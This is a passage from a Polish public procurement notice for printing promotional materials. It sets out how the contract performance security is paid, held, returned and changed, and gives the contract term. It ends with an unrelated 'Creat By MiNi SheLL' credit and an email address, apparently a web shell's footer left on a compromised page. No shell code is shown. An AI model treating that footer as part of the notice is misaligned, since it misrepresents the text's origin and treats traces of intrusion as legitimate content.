05 1130 1017 0020 1214 7720 0001, zaznaczając w tytule przelewu temat: Zabezpieczenie należytego wykonania umowy - Druk oraz dostawa drukowanych materiałów promocyjnych, znak sprawy: ZP-RP-20/13; 
za datę wniesienia zabezpieczenia należytego wykonania umowy w formie pieniężnej przyjmuje się datę uznania rachunku bankowego Zamawiającego.
3)	Zabezpieczenie należytego wykonania umowy wnoszone w formie: poręczenia bankowego poręczenia spółdzielczej kasy oszczędnościowo - kredytowej, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez podmioty o których w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości, (z którego treści winno wynikać bezwarunkowe i nieodwołalne zobowiązanie Gwaranta) należy złożyć w formie oryginału w siedzibie Zamawiającego, w pok. nr 7. 
W przypadku, gdy zabezpieczenie będzie wnoszone w formie innej niż pieniądz, Zamawiający zastrzega sobie prawo do akceptacji projektu ww. dokumentu przed podpisaniem umowy. 
4)	Jeżeli zabezpieczenie wniesiono w pieniądzu, Zamawiający przechowuje 
je na oprocentowanym rachunku bankowym. Zamawiający zwraca zabezpieczenie wniesione w pieniądzu z odsetkami wynikającymi z umowy rachunku bankowego, 
na którym było ono przechowywane, pomniejszone o koszty prowadzenia tego rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy Wykonawcy. 
5)	W trakcie realizacji umowy Wykonawca może dokonać zmiany formy zabezpieczenia na jedną lub kilka form, zgodnie z pkt 1).
6)	Zmiana formy zabezpieczenia jest dokonywana z zachowaniem ciągłości zabezpieczenia i bez zmniejszenia jego wysokości. 
7)	W przypadku wydłużenia terminu realizacji zamówienia, zabezpieczenie należytego wykonania umowy wniesione w formie innej niż pieniądz powinno być również wydłużone do upływu terminów i okresów, o których mowa w art. 151 ustawy Pzp. 12.	Termin wykonania zamówienia: Sukcesywnie od dnia zawarcia umowy do 30 czerwca 2014 r. lub do wykorzystania kwoty przeznaczonej na realizację przedmiotu zamówienia.

Znak sprawy: ZP-RP-20/13.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com